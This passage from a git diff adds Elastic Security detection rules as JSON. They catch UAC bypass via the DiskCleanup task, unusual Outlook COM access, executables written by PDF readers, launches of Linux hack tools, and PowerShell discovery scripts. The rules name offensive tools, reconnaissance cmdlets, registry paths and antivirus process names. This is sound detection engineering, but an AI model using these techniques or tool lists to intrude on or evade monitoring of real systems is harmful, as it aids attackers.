"type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_108.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_108.json new file mode 100644 index 00000000000..48ee73793f0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_108.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via DiskCleanup Scheduled Task Hijack", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"/autoclean\" and process.args : \"/d\" and process.executable != null and \n not process.executable : (\"C:\\\\Windows\\\\System32\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\System32\\\\taskhostw.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_109.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_109.json new file mode 100644 index 00000000000..3cdbbc359fd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_109.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via DiskCleanup Scheduled Task Hijack", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"/autoclean\" and process.args : \"/d\" and process.executable != null and \n not process.executable : (\"C:\\\\Windows\\\\System32\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\System32\\\\taskhostw.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_6.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_6.json new file mode 100644 index 00000000000..bee0f880229 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_6.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects Inter-Process Communication with Outlook via Component Object Model from an unusual process. Adversaries may target user email to collect sensitive information or send email on their behalf via API.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Inter-Process Communication via Outlook", + "query": "sequence with maxspan=1m\n[process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n process.name : (\n \"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cmd.exe\", \"regsvr32.exe\", \"cscript.exe\", \"wscript.exe\"\n ) or\n (\n (process.code_signature.trusted == false or process.code_signature.exists == false) and \n (process.Ext.relative_file_creation_time <= 500 or process.Ext.relative_file_name_modify_time <= 500)\n )\n )\n] by process.executable\n[process where host.os.type == \"windows\" and event.action == \"start\" and process.name : \"OUTLOOK.EXE\" and\n process.Ext.effective_parent.name != null] by process.Ext.effective_parent.executable\n", + "references": [ + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/apt29/Archive/CALDERA_DIY/evals/payloads/stepSeventeen_email.ps1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.executable", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.name", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1dee0500-4aeb-44ca-b24b-4a285d7b6ba1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.001", + "name": "Local Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_107.json b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_107.json new file mode 100644 index 00000000000..522e046ec17 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_107.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious file that was written by a PDF reader application and subsequently executed. These processes are often launched via exploitation of PDF applications.", + "from": "now-120m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of File Written or Modified by PDF Reader", + "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by PDF Reader\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This creates a vector where attackers can exploit the engines and technology behind this class of software for initial access or privilege escalation.\n\nThis rule searches for executable files written by PDF reader software and executed in sequence. This is most likely the result of exploitation for privilege escalation or initial access. This rule can also detect suspicious processes masquerading as PDF readers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the PDF documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=2h\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"AcroRd32.exe\" or\n process.name : \"rdrcef.exe\" or\n process.name : \"FoxitPhantomPDF.exe\" or\n process.name : \"FoxitReader.exe\") and\n not (file.name : \"FoxitPhantomPDF.exe\" or\n file.name : \"FoxitPhantomPDFUpdater.exe\" or\n file.name : \"FoxitReader.exe\" or\n file.name : \"FoxitReaderUpdater.exe\" or\n file.name : \"AcroRd32.exe\" or\n file.name : \"rdrcef.exe\")\n ] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "1defdd62-cd8d-426e-a246-81a37751bb2b", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "1defdd62-cd8d-426e-a246-81a37751bb2b_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_3.json b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_3.json new file mode 100644 index 00000000000..0d12f6190c1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_3.json @@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Hack Tool Launched", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\n // exploitation frameworks\n \"crackmapexec\", \"msfconsole\", \"msfvenom\", \"sliver-client\", \"sliver-server\", \"havoc\",\n // network scanners (nmap left out to reduce noise)\n \"zenmap\", \"nuclei\", \"netdiscover\", \"legion\",\n // web enumeration\n \"gobuster\", \"dirbuster\", \"dirb\", \"wfuzz\", \"ffuf\", \"whatweb\", \"eyewitness\",\n // web vulnerability scanning\n \"wpscan\", \"joomscan\", \"droopescan\", \"nikto\", \n // exploitation tools\n \"sqlmap\", \"commix\", \"yersinia\",\n // cracking and brute forcing\n \"john\", \"hashcat\", \"hydra\", \"ncrack\", \"cewl\", \"fcrackzip\", \"rainbowcrack\",\n // host and network\n \"linenum.sh\", \"linpeas.sh\", \"pspy32\", \"pspy32s\", \"pspy64\", \"pspy64s\", \"binwalk\", \"evil-winrm\"\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1df1152b-610a-4f48-9d7a-504f6ee5d9da", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "1df1152b-610a-4f48-9d7a-504f6ee5d9da_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_106.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_106.json new file mode 100644 index 00000000000..e3c3042ccf8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_106.json @@ -0,0 +1,276 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to discovery activities. Attackers can use these to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\Microsoft Azure AD Sync\\\\Extensions\\\\AADConnector.psm1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "*ServiceNow MID Server*\\\\agent\\\\scripts\\\\PowerShell\\\\*.psm1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\IMECache\\\\HealthScripts\\\\*\\\\detect.ps1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\TEMP\\\\SDIAG*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Temp\\\\SDIAG*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\SDIAG*" + } + } + } + } + ], + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Discovery Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADDomain\" or \"Get-ComputerInfo\" or\n \"Get-Disk\" or \"Get-DnsClientCache\" or\n \"Get-GPOReport\" or \"Get-HotFix\" or\n \"Get-LocalUser\" or \"Get-NetFirewallProfile\" or\n \"get-nettcpconnection\" or \"Get-NetAdapter\" or\n \"Get-PhysicalDisk\" or \"Get-Process\" or\n \"Get-PSDrive\" or \"Get-Service\" or\n \"Get-SmbShare\" or \"Get-WinEvent\"\n ) or\n (\n (\"Get-WmiObject\" or \"gwmi\" or \"Get-CimInstance\" or\n \"gcim\" or \"Management.ManagementObjectSearcher\" or\n \"System.Management.ManagementClass\" or\n \"[WmiClass]\" or \"[WMI]\") and\n (\n \"AntiVirusProduct\" or \"CIM_BIOSElement\" or \"CIM_ComputerSystem\" or \"CIM_Product\" or \"CIM_DiskDrive\" or\n \"CIM_LogicalDisk\" or \"CIM_NetworkAdapter\" or \"CIM_StorageVolume\" or \"CIM_OperatingSystem\" or\n \"CIM_Process\" or \"CIM_Service\" or \"MSFT_DNSClientCache\" or \"Win32_BIOS\" or \"Win32_ComputerSystem\" or\n \"Win32_ComputerSystemProduct\" or \"Win32_DiskDrive\" or \"win32_environment\" or \"Win32_Group\" or\n \"Win32_groupuser\" or \"Win32_IP4RouteTable\" or \"Win32_logicaldisk\" or \"Win32_MappedLogicalDisk\" or\n \"Win32_NetworkAdapterConfiguration\" or \"win32_ntdomain\" or \"Win32_OperatingSystem\" or\n \"Win32_PnPEntity\" or \"Win32_Process\" or \"Win32_Product\" or \"Win32_quickfixengineering\" or\n \"win32_service\" or \"Win32_Share\" or \"Win32_UserAccount\"\n )\n ) or\n (\n (\"ADSI\" and \"WinNT\") or\n (\"Get-ChildItem\" and \"sysmondrv.sys\") or\n (\"::GetIPGlobalProperties()\" and \"GetActiveTcpConnections()\") or\n (\"ServiceProcess.ServiceController\" and \"::GetServices\") or\n (\"Diagnostics.Process\" and \"::GetProcesses\") or\n (\"DirectoryServices.Protocols.GroupPolicy\" and \".GetGPOReport()\") or\n (\"DirectoryServices.AccountManagement\" and \"PrincipalSearcher\") or\n (\"NetFwTypeLib.NetFwMgr\" and \"CurrentProfile\") or\n (\"NetworkInformation.NetworkInterface\" and \"GetAllNetworkInterfaces\") or\n (\"Automation.PSDriveInfo\") or\n (\"Microsoft.Win32.RegistryHive\")\n ) or\n (\n \"Get-ItemProperty\" and\n (\n \"\\Control\\SecurityProviders\\WDigest\" or\n \"\\microsoft\\windows\\currentversion\\explorer\\runmru\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Kerberos\\Parameters\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" or\n \"\\Microsoft\\Windows\\WindowsUpdate\" or\n \"Policies\\Microsoft\\Windows\\Installer\" or\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" or\n (\"\\Services\\SharedAccess\\Parameters\\FirewallPolicy\" and \"EnableFirewall\") or\n (\"Microsoft\\Windows\\CurrentVersion\\Internet Settings\" and \"proxyEnable\")\n )\n ) or\n (\n (\"Directoryservices.Activedirectory\" or\n \"DirectoryServices.AccountManagement\") and \n (\n \"Domain Admins\" or \"DomainControllers\" or\n \"FindAllGlobalCatalogs\" or \"GetAllTrustRelationships\" or\n \"GetCurrentDomain\" or \"GetCurrentForest\"\n ) or\n \"DirectoryServices.DirectorySearcher\" and\n (\n \"samAccountType=805306368\" or\n \"samAccountType=805306369\" or\n \"objectCategory=group\" or\n \"objectCategory=groupPolicyContainer\" or\n \"objectCategory=site\" or\n \"objectCategory=subnet\" or\n \"objectClass=trustedDomain\"\n )\n ) or\n (\n \"Get-Process\" and\n (\n \"mcshield\" or \"windefend\" or \"savservice\" or\n \"TMCCSF\" or \"symantec antivirus\" or\n \"CSFalcon\" or \"TmPfw\" or \"kvoop\"\n )\n )\n ) and\n not powershell.file.script_block_text : (\n (\n \"__cmdletization_BindCommonParameters\" and\n \"Microsoft.PowerShell.Core\\Export-ModuleMember\" and\n \"Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter\"\n ) or\n \"CmdletsToExport=@(\\\"Add-Content\\\",\"\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Discovery", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, 